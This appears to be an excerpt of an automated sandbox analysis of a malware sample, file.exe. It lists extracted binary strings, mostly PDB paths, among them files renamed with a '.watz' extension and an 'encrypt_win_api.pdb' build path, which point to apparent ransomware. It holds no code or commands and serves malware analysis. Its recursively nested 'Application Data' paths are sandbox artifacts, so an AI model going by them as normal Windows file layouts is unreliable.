          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Temp\) source: file.exe, 00000007.00000003.2696325767.0000000003921000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: file.exe, 00000007.00000003.2674394625.0000000003108000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\E| source: file.exe, 00000007.00000003.2736612029.0000000003A51000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2741597672.0000000003A30000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2745251936.0000000003A5B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2744837562.0000000003A49000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\4 source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: file.exe, 00000007.00000003.2639517770.0000000003124000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593877626.0000000003113000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2639724699.0000000003126000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638739498.0000000003113000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638912113.0000000003123000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*W source: file.exe, 00000007.00000003.2412421921.000000000315E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2454804207.000000000313C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638362574.0000000003150000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2411377247.0000000003139000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2427038316.000000000313B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593731037.000000000312B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2411493642.0000000003152000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2454987079.0000000003145000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2412375336.0000000003152000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594175712.0000000003131000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2412325880.0000000003145000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\tW source: file.exe, 00000007.00000003.2673162145.00000000038F1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*r\[ source: file.exe, 00000007.00000003.2750931646.0000000003A83000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\H source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: file.exe, 00000007.00000003.2751614715.0000000000933000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\M source: file.exe, 00000007.00000003.2730941705.00000000039B1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2735871290.00000000039E9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.watz- source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\s\ab/ source: file.exe, 00000007.00000003.2638556300.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2639256814.0000000003623000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638801916.0000000003622000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\M source: file.exe, 00000007.00000003.2379890831.0000000003108000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2379930472.000000000310D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2381763489.000000000310D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbF source: file.exe, 00000007.00000003.2639109083.0000000003612000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638556300.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\ source: file.exe, 00000007.00000003.2594016222.00000000035BB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2639666829.00000000035BD000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\J source: file.exe, 00000007.00000003.2755211411.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2741597672.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2750931646.0000000003A83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2743963892.0000000003A79000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: file.exe, 00000007.00000003.2638556300.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2639575185.000000000367F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2639256814.0000000003623000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638801916.0000000003622000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: file.exe, 00000007.00000003.2743963892.0000000003ABA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2750931646.0000000003A83000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ory\ source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\$# source: file.exe, 00000007.00000003.2755211411.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\ source: file.exe, 00000007.00000003.2725712651.0000000003617000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2734579091.0000000003614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2736175037.0000000003636000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2735075087.0000000003626000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2725226739.0000000003616000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2725916015.0000000003626000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\+ source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.watz source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\8bb source: file.exe, 00000007.00000003.2381738075.0000000003171000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2454804207.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2411377247.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2454987079.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2427038316.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2412375336.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593813478.000000000317C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593731037.000000000316A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: file.exe, file.exe, 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000002.2763316136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 00000009.00000002.2418903589.0000000002260000.00000040.00001000.00020000.00000000.sdmp, file.exe, 0000000B.00000002.2503244707.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 0000000C.00000002.2433084829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 0000000D.00000002.2476597586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 0000000F.00000002.3353830143.0000000000400000.00000040.00000400.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\21\ source: file.exe, 00000007.00000003.2379890831.0000000003108000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2379930472.000000000310D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2381763489.000000000310D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\tory\ source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\| source: file.exe, 00000007.00000003.2756141965.0000000003A4A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\.watz source: file.exe, 00000007.00000003.2454804207.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638362574.0000000003150000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2411377247.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638414568.000000000317A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2639138536.0000000003182000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2454987079.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2427038316.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2412375336.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593813478.000000000317C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593731037.000000000316A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\er\`Z/ source: file.exe, 00000007.00000003.2725712651.0000000003617000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2696418112.0000000003656000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2696841331.000000000366B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2725226739.0000000003616000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2695973619.000000000361E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2725916015.0000000003626000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: file.exe, 00000007.00000003.2454804207.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594175712.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638362574.0000000003150000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2659712109.0000000003176000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2454987079.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2639487318.0000000003175000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2427038316.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638680963.0000000003174000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593731037.000000000316A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: file.exe, 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000002.2763316136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 00000009.00000002.2418903589.0000000002260000.00000040.00001000.00020000.00000000.sdmp, file.exe, 0000000B.00000002.2503244707.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 0000000C.00000002.2433084829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 0000000D.00000002.2476597586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 0000000F.00000002.3353830143.0000000000400000.00000040.00000400.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\a source: file.exe, 00000007.00000003.2381763489.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2454804207.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594175712.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638362574.0000000003150000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2411377247.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2454987079.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2427038316.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2412375336.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593731037.000000000316A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ta\ ? source: file.exe, 00000007.00000003.2755774555.00000000039E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2755318794.00000000039C8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\AC\rod.pdb source: file.exe, 00000007.00000003.2660228602.000000000313D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\w\ source: file.exe, 00000007.00000003.2730941705.00000000039B1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2741597672.00000000039B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2744942555.00000000039C9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2743236831.00000000039B8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\4^ source: file.exe, 00000007.00000003.2730941705.0000000003A68000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2741597672.0000000003A30000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2745251936.0000000003A5B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2744837562.0000000003A49000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\21\ source: file.exe, 00000007.00000003.2672799622.0000000003756000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2671298531.0000000003751000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\es-BO\od.pdb\ source: file.exe, 00000007.00000003.2760394418.00000000035B1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\we\* source: file.exe, 00000007.00000003.2638556300.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2639575185.000000000367F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2660786899.0000000003612000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2696418112.0000000003656000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2696941483.0000000003697000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2660936222.0000000003626000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2696841331.000000000366B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2672043213.000000000368B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2723421722.000000000369A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2639256814.0000000003623000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2695973619.000000000361E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638801916.0000000003622000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: file.exe, 00000007.00000003.2593877626.0000000003113000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\u source: file.exe, 00000007.00000003.2696325767.0000000003921000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.People_8wekyb3d8bbwe\LocalCache\ngs\ineer\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*W source: file.exe, 00000007.00000003.2696356257.000000000315B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2724221545.0000000003158000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbA source: file.exe, 00000007.00000003.2639109083.0000000003612000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638556300.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\t source: file.exe, 00000007.00000003.2698806550.0000000003989000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2696058379.0000000003960000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2698247902.0000000003961000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2673162145.0000000003993000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\* source: file.exe, 00000007.00000003.2454804207.000000000313C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638362574.0000000003150000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2427038316.000000000313B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593731037.000000000312B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2454987079.0000000003145000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594175712.0000000003131000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\c< source: file.exe, 00000007.00000003.2724576983.0000000003990000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2725574739.0000000003999000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: file.exe, 00000007.00000003.2671364003.000000000378D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2697886616.0000000003791000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2695735716.000000000374C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2670719853.000000000376D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2696774171.000000000378D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\E source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\#I source: file.exe, 00000007.00000003.2755908213.0000000003A6A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\e\ source: file.exe, 00000007.00000003.2670677971.00000000035B5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2672571739.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2671990261.00000000035C3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c82d26a9-b16c-48ba-9444-88303f538f65}\\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*W source: file.exe, 00000007.00000003.2670567302.0000000003150000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2659870179.0000000003150000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\a\L source: file.exe, 00000007.00000003.2454943490.0000000003106000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: file.exe, 00000007.00000003.2698806550.0000000003989000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2696058379.0000000003960000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2698247902.0000000003961000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2673162145.0000000003993000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\hyphen-data\p.pdb\y source: file.exe, 00000007.00000003.2661790461.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2674492135.0000000003606000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\re\ source: file.exe, 00000007.00000003.2761328703.0000000003AD6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\x source: file.exe, 00000007.00000003.2755774555.00000000039E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2755318794.00000000039C8000.00000004.00000020.00020000.00000000.sdmp
